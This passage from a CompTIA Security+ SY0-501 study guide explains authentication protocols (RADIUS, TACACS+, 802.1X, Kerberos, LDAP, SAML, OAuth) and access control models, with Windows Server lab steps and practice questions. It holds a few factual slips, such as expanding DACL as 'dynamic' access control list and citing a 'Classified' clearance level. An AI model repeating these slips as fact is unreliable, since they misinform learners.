information, or it can rely on an external source like SQL, Kerberos, or Active Directory servers. The odd part
is that the client isn't the actual user workstation: instead it's the network access server (NAS, sometimes also
called the remote access server.) The NAS can be on the internal LAN, or on the remote site, and it serves as a
relay for all communication between user workstations and the RADIUS server. Connecting users actually
send their own authentication requests to the NAS, but the NAS passes them on to the RADIUS server for
authorization.

The actual transfer of credentials in RADIUS still uses PPP protocols like PAP, CHAP, or EAP; it's just a little
more complex due to the relaying nature of the protocol.

CompTIA Security+ Exam SY0-501 385


Chapter 8: Authentication / Module B: Authentication protocols

1. When the user first connects, the NAS requests authentication information. It could be transmitted via
PPP methods, or by other means such as a secure web form.
2. Once it receives user credentials, the NAS sends an Access Request message to the RADIUS server. It
contains not only the user's credentials, but also anything else the NAS knows about the user: network
address, telephone number, physical connection type, and so on. The password itself is encrypted, though
the rest is in plaintext.
3. The RADIUS server evaluates the credentials and gives one of three responses to the NAS: Access
Accept, Access Reject, or Access Challenge.
4. The NAS responds to the client according to the server response:

• An Access Accept message means the user is authenticated and joined to the network.
• An Access Reject message means the user is prompted again for credentials. After a set number of
failed attempts, the user is automatically disconnected.
• An Access Challenge message means the user is prompted for additional credentials, like a
secondary password or another authentication factor. This isn't a rejection, just a request for more
information before access is accepted. It's commonly used with more complex authentication
protocols.

Once the user is authenticated, the NAS continues to behave as an intermediary between the client
workstation and the network. Wireless RADIUS networks can even support roaming from one AP to another,
in what is called a RADIUS federation.

386 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

TACACS+
RADIUS is another one of those protocols that's widely used but has issues with scalability, flexibility, and
security. A popular alternative is Terminal Access Controller Access Control System (TACACS+), a proprietary
Cisco protocol with similar features. (The plus is because TACACS+ is based on (but not backwards-
compatible with) the earlier TACACS and XTACACS protocols, which are no longer supported.)

Exam Objective: CompTIA SY0-501 4.2.3


TACACS+ has a number of advantages over RADIUS.
 While RADIUS uses UDP, TACACS+ uses TCP. Since TCP is connection-oriented, it provides
message acknowledgement, so when a client or server doesn't get a quick response it knows something
is wrong. It also scales better on large or congested networks.
 Unlike RADIUS, TACACS+ encrypts entire access request packets. Even if encrypting the password
itself is most important, protecting other system information from eavesdroppers enhances security.
 While RADIUS combines authentication and authorization into a single step, TACACS+ fully
separates all three steps of the AAA process. This allows any of the three to be individually handled by
a different server, or even a different protocol entirely.
 TACACS+ supports more non-IP protocols, such as AppleTalk, NetBIOS, Novell, and X.25.

TACACS+ isn't always better than RADIUS. It's more resource intensive, it's not compatible with all network
configurations, and while it's fairly open and interoperable it's still a proprietary solution. Additionally, it
wasn't really designed for user authentication like RADIUS; instead, TACACS+ is primarily intended for
remote administration of network devices.
Another alternative is Diameter, which has enhancements similar to TACACS+ and more but was explicitly
designed as a RADIUS successor. The name itself is even a pun on how it's twice as good as RADIUS.
Diameter might displace the others in the future, but for now it's mostly used in large-scale carrier
applications that require its full feature set, such as new 4G networks.

RAS
Another system for remote connection to a LAN is Remote Access Service, used by Windows Server. Like
RADIUS it's designed for dial-in connections, but it can work with any PPP connection. Unlike RADIUS, the
remote connection is directly to, and authenticated by, the Windows server. Newer additions add routing
capability, and are called Routing and Remote Access Service (RRAS).
RRAS allows remote clients to access the server's network, just like if they had joined it directly. It can be
used as a way to let remote users join the LAN, or it can provide Internet access, allowing a Windows server
to act as an ISP.

Note: Maybe because it's Windows and remote, RRAS sometimes gets confused with Remote Desktop
Protocol, but the two are very different. RDP is a remote control protocol; it runs the server's
applications locally using the server's CPU and other resources, and the network connection carries user
input one direction and screen output in the other. RRAS is a remote access protocol more like
RADIUS: remote clients run their own applications, and the server has to worry only about handling
communications.

802.1X
PPP authentication methods are just that: they're intended to be used for users to join a LAN via a WAN
connection. Kerberos is meanwhile meant to centrally secure server resources on a non-secure network. There
are a lot of times when you might just want to restrict who joins a LAN on local connections—for example to
keep users from attaching unauthorized workstations, routers, or access points to the network. IEEE 802.1X is
an EAP extension meant for exactly this purpose.

CompTIA Security+ Exam SY0-501 387


Chapter 8: Authentication / Module B: Authentication protocols

Exam Objective: CompTIA SY0-501 4.3.5.2, 6.3.2.6


802.1X is most commonly seen in 802.11 Wi-Fi networks: it's the underlying technology of WPA-Enterprise
and WPA2-Enterprise, and other variants can even give strong security using WEP. However, it's isn't limited
to Wi-Fi: it was originally developed for Ethernet, and can be used for other LAN technologies in the IEEE
802 family. The 802.1X protocol encapsulates EAP messages into EAP over LAN (EAPOL) frames, and it
relies on some sort of back-end AAA server. It was designed with RADIUS in mind, but that isn't strictly
required; Diameter will work, as will TACACS+ with some limitations.
There are three main components in the 802.1X system. For example purposes, we'll assume a typical
RADIUS back end.

Supplicant A device (like a workstation) that wishes to connect to the network.


Authenticator A network device, like a switch or WAP, which lies between the supplicant and the
LAN. It also serves the role of RADIUS client.
Authentication server A RADIUS server using EAP.

The authenticator serves as the gatekeeper of the network: all traffic to or from unauthorized supplicants is
blocked, except for the EAPOL frames used for authentication. It responds to any other traffic with a request
for credentials.

1. The supplicant uses EAPOL to send its identity to the authenticator, along with a requested EAP
authentication method.
2. The authenticator forwards the request to the authentication server in RADIUS format.

3. The authentication server responds to the authenticator in RADIUS format, which relays it to the
supplicant as EAPOL.

• If the ID and EAP method are accepted, it sends a challenge message.


• If the ID isn't valid, it sends a rejection.
• If the ID is good but the EAP method isn't supported, it sends a list of acceptable EAP methods, so
the process can repeat.

388 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

4. The supplicant sends its credentials to the authentication server, via the authenticator.
5. If the credentials are accepted, the authentication server notifies the authenticator to accept normal traffic
from the supplicant. If wireless encryption is in use, it also sends a session key for the authenticator to use
with that supplicant.
802.1X is popular and fairly effective, but it does have some flaws. In particular, since authentication happens
only once, it's vulnerable to MitM attacks on the physical network. Wireless networks are actually better-
protected by physical topology and encryption, but on wired networks a local attacker could literally insert a
hub or switch between the supplicant and authenticator, inheriting the supplicant's permissions. This means
that 802.1X shouldn't be considered a complete access security solution for wired LANs.

Exercise: Installing a RADIUS server


In this exercise, you'll install a RADIUS server in Windows Server 2012.
Do This How & Why

1. On the Windows Server 2012 VM,


install the network policy server role.

a) In Server Manager, click Add roles


and features.

The Add Roles and Features Wizard window opens.

b) Click Next twice. To skip the intro screen and select the default installation type.
You can now select what server to install the role on.

c) Click Next. To select the current server and view the list of roles.

d) Check Network Policy and Access


Services.

A new window pops up, notifying you of additional features


the role requires.

e) Click Add Features. To close the window.

f) Click Next four times. You'll accept all defaults.

CompTIA Security+ Exam SY0-501 389


Chapter 8: Authentication / Module B: Authentication protocols

Do This How & Why

g) Click Install. The installation process may take a few minutes.

h) Click Close.

2. Configure the network policy server. You'll configure it as a RADIUS server to provide 802.1X
authentication for a wireless access point.

a) In Server Manager click Tools > The Network Policy Server console window appears.
Network Policy Server.

b) From the Standard Configuration


list, select RADIUS server for
802.1X Wireless or Wired
Connections.

c) Below the list, click Configure The Configure 802.1X wizard appears. You can configure the
802.1X. server either to authenticate wireless clients, or wired Ethernet
clients.

d) Click Secure Wireless Next, you need to add RADIUS clients.


Connections, then click Next.

3. Add a RADIUS client. In this context, a client is the WAP that requires user
authentication.

a) Click Add The New RADIUS Client window opens.

390 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

Do This How & Why

b) Enter a name, IP address, and If you have a real WAP configured for the exercise, enter its IP
shared secret (password) in the address.
window, then click OK.

The WAP now appears in the client list.

4. Configure the server to authenticate


via digital certificates.

a) Click Next. 802.1X is a form of EAP, so it allows different authentication


types.

b) From the Type list, select To select digital certificates as an authentication method.
Microsoft: Protected EAP
(PEAP) and click Next.

c) Click Add. The Add Groups window opens.

d) Type Domain Users in the


object name field, and click OK.

e) Click Next twice, then click Finish. To accept all other defaults.

CompTIA Security+ Exam SY0-501 391


Chapter 8: Authentication / Module B: Authentication protocols

To complete this process for real, you would need to create and export a digital certificate for wireless clients
to authenticate with. You would also need to configure your WAP to use 802.1X (WPA Enterprise)
authentication with your server's IP address and password.

Kerberos
Kerberos was developed at MIT as part of Project Athena, a project to develop a distributed computing
system. It was named for the three-headed guard dog owned by Hades in Greek mythology. It was designed to
provide mutual authentication and encryption for secure communication between clients and servers on a non-
secure network. Currently at version 5, Kerberos has been widely adopted: it's the default authentication
protocol for Windows domains, and is also used by many Unix-like operating systems, web applications,
embedded devices, and other products. The original implementation is also available under a free license from
MIT at http://web.mit.edu/kerberos/, though since it uses strong encryption it's still subject to
some US cryptographic export laws.

Exam Objective: CompTIA SY0-501 4.2.2


Kerberos is basically network security via a single sign-in method: nodes negotiate with each other on the
word of a trusted third-party, the Kerberos server. Users go through the authentication process when they first
connect, and after that they can communicate securely with any other node; the Kerberos protocol presents
their credentials and sets up security without further user input.
A Kerberos system has several components.

392 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

 The basic unit of a Kerberos network is a realm. Large organizations can have multiple realms, but
each realm has a unique name within the organization. Every principal, or node, is a member of a
realm.
 Each realm is controlled by a key distribution center (KDC) which distributes the cryptographic tokens,
or tickets, used to manage network access. The KDC has two components, which usually are on the
same physical host.

• The authentication server (AS) authenticates users and gives them a special ticket-granting ticket
(TGT). It contains the full list of users and servers in the realm, and the secret key of each.
• The ticket-granting service (TGS) validates TGT holders, and issues them temporary credential
tickets and cryptographic session keys to access specific resource servers. A remote TGS (in another
realm) is called an RTGS.

Kerberos authentication
Some implementations of Kerberos use public key cryptography for authentication, but the core protocols are
designed to work solely with symmetric cryptography. Instead of the private half of a key pair, the secret key
for a user or service is a salted, hashed password created during setup. Additionally, there's no direct
communication between the KDC and resource servers: all communication is between clients and servers.
Messages are also time-stamped to prevent replay attacks, so all nodes need to be time-synchronized.
Guaranteeing secure communication under those restraints takes a fairly exacting process, but it allows
mutual authentication without any sensitive information being shared as plaintext.

CompTIA Security+ Exam SY0-501 393


Chapter 8: Authentication / Module B: Authentication protocols

1. The user logs into a client workstation with a user name and password. The client immediately requests a
TGT from the AS. This is a plaintext message, so it doesn't include a password: only the user name, AS
name, network address, and requested ticket lifetime.

2. If the AS finds the user in its database, it sends back two messages.

• A TGT, encrypted with the TGS secret key. It contains the information from the initial request, plus
the TGS ID, a timestamp and a newly created TGS session key to be shared between the client and
TGS.
• A matching message encrypted with the user's secret key. It contains the TGS idea, timestamp,
lifetime and the same session key. This is how authentication actually happens: only the valid user
password can decrypt this message and learn the session key.

3. After learning the session key, the client sends three messages to the TGS to request access to a specific
server.

• The TGT
• An authenticator encrypted with the session key. It contains the client name and a timestamp.
• A plaintext message containing the name of a resource server and requested ticket lifetime.

4. The TGS decrypts the TGT with its secret key to learn the session key, then uses the session key to
decrypt the authenticator. If the service, timestamp, and user all seem valid, it sends the following
messages in response.

• A credential ticket for the service, encrypted with the resource server's secret key. Much like a TGT
it has the user's information, a timestamp, lifetime, and a service session key created by the TGS.
• A matching message encrypted by the TGS session key, and containing the service session key.

394 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

5. The client decrypts the second message to learn the service session key, and uses it to create a new
authenticator. It sends the authenticator and service ticket to the resource server.
6. The resource server decrypts the service ticket to learn the session key, and uses the session key to
decrypt the authenticator. If all information checks out, the client is authenticated on the resource server,
and they can communicate securely. This step can also use mutual authentication.
Whenever the client wants to log into a new service, or when a service ticket expires, it can present its TGT to
the TGS again for a new request. What happens when the TGT itself expires depends on network settings and
implementation: the user might need to log in again, or the client might be able to transparently request a new
TGT.

LDAP
Lightweight Directory Access Protocol is a simpler version of the ITU-T X.500 standard, also known as
Directory Access Protocol. In this context, a "directory" is a database that stores information about network
users, systems, services, and so on, and LDAP allows users to make queries to that database. One of its most
common uses is as a central place to store and manage user names and passwords. For instance, RADIUS
servers commonly use LDAP databases for storing passwords. LDAP can even serve as an authentication
method for other services in itself, with some limitations.

Exam Objective: CompTIA SY0-501 4.2.1


LDAP queries are commonly used in scripts or sent as URLs. Their syntax is fairly easy to recognize, since
they have objects separated by commas. For example, the following URL would go to ldap.javatucana.com
and perform a base query on Rose Schiller.
ldap://ldap.javatucana.com/CN=Rose%20Schiller,DC=javatucana,DC=com

Active Directory used by Windows servers is based on LDAP and Kerberos, using LDAP for queries and
Kerberos for authentication and SSO. LDAP is also popular in Unix and other systems, sometimes with other
plugins to let it operate for authentication purposes.
LDAP has some limitations. It isn't very useful for SSO in itself, even though it's commonly used by intranet-
based SSO authentication services. It's not very secure either, since it's meant to operate on trusted networks.
Secure LDAP(LDAPS) uses SSL or TLS encryption, and operates on port 636 instead of port 389. Even with
TLS, LDAPS has a large attack surface, so it's not generally used directly over the public internet.

SAML
Security Assertion Markup Language (SAML) is an open XML-based standard that's used to exchange
authentication and authorization information. SAML 1.0 was first standardized in 2002, and the current
version is SAML 2.0. It's commonly used by SSO environments, especially those using federated identity
systems in enterprise environments. For example, it's the standard used for SSO by Salesforce and Google's
enterprise apps.

Exam Objective: CompTIA SY0-501, 4.2.8, 4.2.11


SAML works by sending XML-based messages between systems, and is transparent to the end user. There are
three defined roles in a SAML system.

Principal A client seeking to be authenticated, typically an end user.


Identity provider An authentication server that holds a directory of users and their permissions.
Service provider A server containing resources, such as a web application.

CompTIA Security+ Exam SY0-501 395


Chapter 8: Authentication / Module B: Authentication protocols

The SAML authentication process is in a way the opposite of the Kerberos process. The principal starts by
directly contacting the service provider, and the service provider asks for an authentication token from the
identity provider. If yes, the service provider gives access; if not, the principal automatically negotiates with
the identity provider for authentication. The service provider and identity provider don't need to directly
communicate as part of this process, only to maintain a trust relationship.
SAML doesn't specify an authentication mechanism. The identity provider can be configured to use RADIUS,
LDAP, SQL, or any number of other authentication methods, just as long as it exchanges the right sort of
SAML tokens with the service provider. Depending on the network's configuration, service providers can
handle authorization themselves, but SAML messages can transfer authentication data from one system to
another. In fact, the XACML standard used for ABAC is easily integrated with SAML, since both were
designed by OASIS to interoperate.

Note: Like any authentication service, SAML is vulnerable to certain attack types, depending on
implementation and version. Due to its XML based tokens, one attack used against SAML is XML
signature wrapping. In this attack, a MitM attacker carefully modifies signed XML messages to change
what they do without invalidating their signatures. Depending on the message this might involve giving
users extra permissions, giving permissions to a different user instead, or injecting arbitrary content.
SAML 2.0 allows developers to perform validation that will detect such attacks, but only if it is
configured properly.
One popular SAML implementation is the open source Shibboleth project, named for a linguistic concept by
which social groups learn to identify each other. Many major organizations, especially academic institutions,
have formed Shibboleth federations to manage inter-institutional identity management.

OAuth and OpenID


SAML is a well-established standard but it has some limitations. It works best for SSO in web applications,
between providers that have a strong trust relationship with each other. For various reasons, it doesn't work
very well with native mobile applications, or in many consumer-oriented SSO environments. Two interrelated
standards that have emerged recently are Open Authorization (OAuth) and OpenID.

Exam Objective: CompTIA SY0-501 4.2.9, 4.2.10


One common place you might have seen OAuth being used is when one application asks to be given
permission to use another application's resources. For example, imagine that you join an online game, and it
asks to access your Facebook contacts to see if anyone else you know plays it already, or to post your in-game
achievements as status updates. Just because you trust the game to do that doesn't mean you want to give it
your Facebook password: what if it (or someone at the game company) used those permissions to access your
private messages and photos, or change your Facebook settings?

396 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

OAuth solves that problem by access delegation, allowing you to give the game authorization to use some
(but not all) of your Facebook account. It designates four roles.

Resource owner A person or application who has access to some computing resource and account
credentials that specify access to them. In the above example, you are the owner of the
resources contained in your Facebook account.
Client application An application that wants to access a resource. Clients aren't given complete access to the
resource, but only within a scope authorized by the owner. The game that wants access to
your contacts is a client, and "view contacts and make status postings" is a scope.
Resource server The server containing access to the resource; in this case, Facebook itself.
Authorization The server that validates the identity and permission of the resource owner and issues
server access tokens to the client. It can be the same as the resource server, but doesn't need to
be. Facebook is both a resource server and an authorization server, whether or not they're
located on the same literal servers.

To apply this process so you can finally play your game, the game server asks you for permission to access
your Facebook account. When you click Yes you're asked to enter your Facebook credentials, but you submit
them directly to Facebook rather than exposing them to the game. Facebook then issues an access token to the
game, which it can use only in the ways specified. Like SAML, OAuth can give access based on ABAC
principles, so it's possible to give very fine control of what kinds of access are and are not permitted.
OAuth is only an authorization framework; it doesn't actually handle SSO authentication between systems. It
can't, for example, let you just use your Facebook account credentials to sign into the game. For that, the
separate but complementary OpenID standard has become popular. The current version, OpenID Connect,
runs as a layer on top of the OAuth framework.
OAuth and OpenID Connect are the basis for, or at least supported by, an ever-increasing number of
organizations, especially those hosting consumer-oriented web apps and services.

Note: OAuth and OpenID Connect can provide strong security when implemented properly, but still
have potential vulnerabilities. One is the fact that neither includes encryption, signatures, or other
security in the language itself. Instead, both rely on TLS connections between all participants, so are
vulnerable to anything that can compromise the TLS protection. More seriously, since it relies on human
users to supply credentials to an authentication server, a phishing page can give the appearance of
asking a user for OAuth authorization for limited account functionality, while actually stealing
credentials for the entire master account.

CompTIA Security+ Exam SY0-501 397


Chapter 8: Authentication / Module B: Authentication protocols

Exercise: Examining Active Directory


Windows domains are controlled via Active Directory, Microsoft's directory service. AD uses LDAP,
Kerberos, and DNS as its primary protocols. You'll examine some of AD's workings.
Do This How & Why

1. Examine Active Directory.

a) In Server Manager, click Tools. The menu shows your server's various roles. Several involve
Active Directory functions.

b) Click Active Directory The Active Directory Administrative Center window


Administrative Center. appears.

c) Maximize the window. On the left you can browse AD areas. On the right are some
helpful links and a password reset tool for domain users.

2. Browse AD objects. Active Directory stores objects representing users, computers,


devices, and other resources on the network. It uses LDAP as
the primary protocol for storing and accessing them.

a) In the left pane, click mwha To select the local domain. The center pane shows a number of
(local). folders representing different object types in AD's structure.
Each also has a type listed.

398 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

Do This How & Why

b) Double-click Users. This folder contains users and groups currently registered on
the domain.

c) Navigate to the System folder. You'll have to click mwha (local) in the left pane, then double-
click System in the middle. It contains additional folders
representing system settings. LDAP, and AD, store objects in a
hierarchical tree.

d) Close the Active Directory You'll view objects another way.


Administrative Center.

3. View Active Directory users. The other AD consoles give you better access to different
aspects of AD.

a) In Server Manager, click Tools > The Active Directory Users and Computers console opens.
Active Directory Users and It has some, but not all, of the folders you saw before.
Computers.

b) On the left, navigate to mwha.local It's the same list of groups and users you saw in the
> Users. Administrative Center.

c) Double-click Administrator. AD uses LDAP to store and retrieve all user settings and
credentials. You can even install a Microsoft Exchange email
server to distribute mail via LDAP. The Properties window
appears, with all settings for the Administrator account.

d) Close the Properties window.

e) Click the mwha.local > The WIN7 client computer is also an AD object.
Computers folder.

f) Close Active Directory Users and


Computers.

CompTIA Security+ Exam SY0-501 399


Chapter 8: Authentication / Module B: Authentication protocols

Do This How & Why

4. View Kerberos settings. While it's less obvious, AD uses Kerberos as the SSO protocol
to authorize access to all network resources.

a) In Server Manager, click Tools > The Group Policy Management console opens.
Group Policy Management.

b) On the left, expand Forest:


:mwha.local > Domains >
mwha.local

c) Right-click Default Domain Policy The Group Policy Management Editor console opens. It
and click Edit. allows you to edit domain security policies.

d) In the left pane, navigate to You can view and edit Kerberos authentication and ticket
Computer Configuration > policies for the domain here. You'll keep the defaults.
Policies > Windows Settings >
Security Settings > Account
Policies > Kerberos Policy.

5. Close both console windows. Leave Server Manager open.

Assessment: Authentication protocols


1. Which protocol is more of a message framework than an authentication method in itself? Choose the best
response.
 CHAP
 EAP
 MS-CHAP
 PAP

400 CompTIA Security+ Exam SY0-501


Chapter 8: Authentication / Module B: Authentication protocols

2. Your wireless network is configured in 802.1X mode. What kind of server does it most likely use as a
back end? Choose the best response.
 KERBEROS
 RADIUS
 TACACS+
 TKIP

3. Your remote access system currently uses RADIUS, but one administrator is proposing replacing it with
TACACS+. What benefits might this provide?. Choose all that apply.
 Better able to support non-IP protocols
 Better suited to large networks
 Less complicated to administer
 More secure
 More focused on user authentication

4. You've been asked to help consult for security on an application that's designed to interoperate with
Google and Salesforce SSO systems. What protocol should you study first? Choose the best answer.
 Kerberos
 LDAP
 RADIUS
 SAML

5. Unlike LDAP, LDAPS ________? Choose all that apply.


 Includes SSL or TLS encryption
 Is compatible with Unix-based operating systems
 Is safe for use on the public internet
 Uses port 389
 Uses port 636

6. Your company is developing a custom web app for the sales team. It should be able to access a list of
Salesforce contacts, but for security reasons the app shouldn't be able to access the actual Salesforce
account. What standard would allow this? Choose the best response.
 Kerberos
 OAuth
 OpenID Connect
 SAML

CompTIA Security+ Exam SY0-501 401


Chapter 8: Authentication / Summary: Authentication

Summary: Authentication
You should now know:
 About the AAA process, authentication factors, common digital credentials, and how SSO and
federated identities work.
 About common network authentication protocols, including PPP authentication protocols, RADIUS
and its relatives, Kerberos, LDAP, and SAML.

402 CompTIA Security+ Exam SY0-501


Chapter 9: Access control
You will learn:
 About access control principles
 About account management

CompTIA Security+ Exam SY0-501 403


Chapter 9: Access control / Module A: Access control principles

Module A: Access control principles


Just because you're sure that's Peggy, that doesn't mean you want to let her borrow your car. Likewise, just
because a user is authenticated doesn't mean they have access to all resources. This is why the next step,
authorization, is important. Sometimes, especially on the network, authorization is carried out in the same
step as authentication. Other times, like for a user logged into a computer, authorization is a separate step
carried out whenever an authenticated user tries to access a secured resource.
You will learn:
 How to compare and contrast access control models
 About ACLs
 About NTFS permissions and inheritance

Access control models


Any authorization system needs to have a consistent method to determine what privileges are and are not
associated with each user. There are several approaches for actually accomplishing this. Four of the most
commonly used models are:

Exam Objective: CompTIA SY0-501 4.3.1

DAC In discretionary access control, the owner or creator of each controlled object decides who
can access it and what permissions they have. This model is used by Windows and most
common Unix-like operating systems, and it's widely used in other business applications as
well.
MAC In mandatory access control, administrators decide security classifications, or labels,
assigned with each user and each resource. A user can only access a given resource if their
labels match: for example, a user with Secret clearance can access Secret files. MAC is
difficult to implement properly, but allows very high security. It was developed for military
use but is common in other high-security environments and operating systems.
Rule-based Access is determined by a set of rules configured by administrators; these can either be
access control static, or dynamic and triggered by other events. "Rule-based" access control is used to
describe different, mutually exclusive approaches. Some are more sophisticated versions of
MAC, while others are simpler. The most familiar application of this model is in routers and
firewalls, which use rules to allow or deny traffic.
Role-based Similar to MAC in that administrators define permissions, but instead of clearance levels
access control users are assigned to one or more roles, for example representing job functions. Each role
has a list of permissions. Role-based access control is popular in commercial applications
and military systems.
Note: RBAC might be used to refer either to rule-based or role-based
models, so when you see the acronym you need to determine which is
meant by context.
ABAC Attribute-based access control applies security attributes to resources, users and
environments, then defines policies governing combinations of those attributes. When a
user requests access to a resource, it's approved or denied based on the policy. ABAC is a
flexible system which can be used to implement other models within it.

404 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module A: Access control principles

Past the way permissions are assigned, access control can also be classified by what default permissions are.

Implicit Deny Access is denied unless a rule explicitly allows it. A permissions list based entirely
on explicit allowances is often called a whitelist. Secure access control systems
almost always are based on implicit denial. MAC is by definition.
Implicit Allow Access is allowed unless a rule explicitly denies it. A permissions list containing
only explicit denials is called a blacklist. Rule-based access control can be based
on implicit allowance, but a more familiar example might be antivirus or IPS
software that only acts when it detects a problem.

While implicit deny is the foundation of a secure access control system, many allow both explicit allow and
explicit deny rules. This makes it a lot easier to create exceptions. For example, in a file system based on
implicit deny, you could use explicit allow to give users access to a folder, but explicit deny to restrict a
particular file in that folder.

Discretionary access control


The DAC model provides overall security while being fairly flexible and easy to implement, so it's widely
used in operating systems. In the typical DAC system, every file, folder, resource, or other has an owner. The
owner, sets access permissions by editing an access control list (ACL) attached to the object.
A simple example of DAC is the permissions system used by Linux and other Unix-like operating systems. In
that system, every file or directory is owned by a particular user, and it's also assigned to a particular group,
which can include multiple users. Users and groups are both identified by numbers in the operating system,
but users usually see the associated name. The owner (or an administrator) can then configure the object's
access permissions, or modes, separately for the owner, the group, and for any other user. The permissions are
fairly simple as well:

Read (r) Read a file, or list the contents of a directory.


Write (w) Modify a file, or create, modify, or delete files within a directory.
Execute (x) Execute a file, or enter a directory and access its subdirectories.

In this example, the directory's contents all belong to the user waffle, though the groups differ.
 The proto directory also is assigned to waffle's private group. waffle can read, modify, and execute
(enter) it (rwx). Any other user can read the directory's contents, but not write to it or enter it (r--). It
has group permissions, but unless other people are in waffle's group, they're unlikely to come up.
 The proto.old directory has the same permissions as proto, but it's been assigned to the archives
group. This means anyone who belongs to the archives group can read and enter it (r-x).
 sales.txt and its backup sales.txt~ both are assigned to the sales group. waffle can read and
modify it but not execute it (rw-), members of the sales group can only read it (r--), and other users
can't access it at all (---).

You might wonder why the owner isn't just assumed to have complete permissions to an object, but there's a
very good reason for that. Blocking write access to your own files makes it harder to modify them by mistake,
and lacking execute permissions makes it hard to accidentally run what looks to be a data file but is actually a
malicious executable or script. It also protects programs you run from doing those things without your
knowledge.

CompTIA Security+ Exam SY0-501 405


Chapter 9: Access control / Module A: Access control principles

This relates to one of the main weaknesses of DAC: it makes it easy for trojan horse attacks to bypass
permissions. When you run a program, you're effectively giving it your own permissions, and if it changes
files, alters their permissions, or leaks them to untrusted parties it might be hard for you to notice.

NTFS permissions
In Windows, NTFS volumes use a similar DAC model to Unix-like operating systems, but a bit more flexible
and complex.

Exam Objective: CompTIA SY0-501 2.3.3, 4.3.6, 4.4.2.9

The general principles of it are the same: objects are owned by someone, and users or groups can have
different levels of access. There's no third "Everyone" permission, but there is an "Authenticated users" group
that serves pretty much the same purpose. The important difference is that while every object only has one
owner, it can have a separate set of permissions for any number of different users or groups. The terminology
is also somewhat different, reflecting the differences in the models and in the underlying operating systems.

SID A security identifier identifies a particular principal, such as a user or group. In general, you'll see
it as a user-readable name, but the underlying SID (which you might encounter occasionally) is a
long numerical string. A typical SID looks something like S-1-5-21-2848498414-
1294978650-2608437243-500.
ACE An access control entry is a piece of metadata attached to an object, containing a SID and the
permissions it has. An ACE can have positive (allow) or negative (deny) rules. There are more
possible permissions than in Unix: you can separately set read, write, modify, execute, list folder
contents, or more. You can even set full permissions with a single flag.
DACL A dynamic access control list is the whole list of ACEs that apply an object. It doesn't only include
the explicit ACEs set on that precise object, but also the inherited ACEs it receives from its parent
object, and the generic ACEs set to give default behavior for entire object classes.

It's also a little less intuitive just what permissions apply to a given user that wants to access a particular
resource. When you try to access an NTFS file, Windows examines the SIDs for your user name and all of the
groups you belong to, then goes through the object's DACL to see what ACEs apply to you. If none do, you're
implicitly denied access. If some do, Windows then applies those ACEs in the following priority.

406 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module A: Access control principles

1. Explicit deny
2. Explicit allow
3. Inherited deny
4. Inherited allow
Multiple ACEs for different groups are cumulative: if one ACE gives you read access and another ACE gives
you write access, you'll have both. But due to priority, if one ACE explicitly denies you read access and
another explicitly allows it, you'll be denied access. This is a sort of fail safe mechanism, making it harder to
leave a loophole when blocking access to resources.

Note: When you share NTFS files or folders on the network, and the sharing permissions are different
than the NTFS permissions, the more restrictive permission takes effect. For example, if the NTFS ACE
gives read/write permissions, and the share is read-only, the remote user won't be able to write to the
folder. The same would be true if the share was read/write, but the NTFS folder was read-only.

Mandatory access control


Mandatory access control is centrally managed by administrators. Even with files they've created, users aren't
inherently able to unilaterally change permissions to give someone else access, or otherwise override security
policies set by administrators. This allows for much stronger security, and protects against the damage done
by trojan horses. The main disadvantage of MAC is that it's much less flexible, and needs much more hands-
on setup and management by administrators to remain usable. MAC is supported by a wide variety of
operating systems, though by default it may not be installed or apply throughout the operating system. For
example, Security Enhanced Linux (SELinux) adds MAC to Linux operating systems, while Windows Vista
and newer use Mandatory Integrity Control to apply security to running processes.
Instead of ACLs, MAC systems typically apply security labels both to users and to resources, and the rules for
access depend on how the labels match up. A simple MAC system might simply use levels of sensitivity. For
example, if it's using a simple government style classifications, all information would be marked as
Unclassified, Confidential, Secret, or Top Secret. Each user would likewise have a clearance label of one of
the same values.

This particular model is called the Bell-LaPadula model. It's also classified as a type of lattice-based access
control (LBAC), because you can construct a mathematical lattice that compares the user's clearance level to
the resource's sensitivity level, and enforces a set of rules called information flow.
 Users have read/write access to resources of their own level. A user with Secret clearance can read and
write Secret documents.
 Users cannot read resources of a higher sensitivity level, but may be able to write to them. This is
called a "no read up" policy. That same Secret user can't read documents in the Top Secret folder, but
can save new ones there (presumably for people of higher clearance to read.).
 Users can read resources of a lower sensitivity level, but cannot write to them. This is called a "no write
down" policy. A Secret user can read Classified documents, but not create or modify them.

CompTIA Security+ Exam SY0-501 407


Chapter 9: Access control / Module A: Access control principles

The last one might sound a little counter-intuitive, but it's very important for maintaining security. It's what
prevents a trojan horse or other trick from making a user with a high clearance move or copy highly sensitive
data to a low sensitivity location.
MAC systems can add other features, like compartmentalization to enforce need to know restrictions. A Top
Secret document might be further labeled with a specific department or project, and to access it a user not
only needs to have Top Secret clearance, but the project security label as well.

Role-based access control


Role-based access control can be classified as a form of MAC, since access is centrally controlled by
administrators, but like DAC it allows access to be permitted for individual resources on a more flexible level.
Unlike DAC, RBAC generally has no strict concept of ownership, and it doesn't store permissions on each
object. Instead, it defines roles, each with a set of access rights defining how it can access each type of object.
Roles are very similar to DAC groups, in that a user can belong to one or more roles, and gets the cumulative
permissions of all of them; however, in many role-based systems it's recommended users belong only to one
role at a time.

QuickBooks is a popular application which uses roles to secure access.

Much like in NTFS, when a user wants to access a resource in a RBAC system, the system examines the
permissions of all the user's roles and sees if any apply. Unlike NTFS there are typically only positive, not
negative, permissions—as long as the user has at least one role authorized to take the requested action, the
action is allowed. Otherwise, implicit deny takes over and access is denied.
RBAC is rather flexible, and able to perform most of the functions of either DAC or traditional MAC systems
when properly implemented. Since it's centrally administered it can be changed easily by administrators either
by editing roles or by changing the roles assigned to particular users, and at the same time it can't be easily
bypassed by users like a DAC system. It's also well-designed for enforcing separation of duties: you can
easily assign different parts of multi-step processes to different roles, and then not assign those roles all to one
person.

408 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module A: Access control principles

Rule-based access control


Rule-based access control shares a common acronym with role-based access control, but they're otherwise
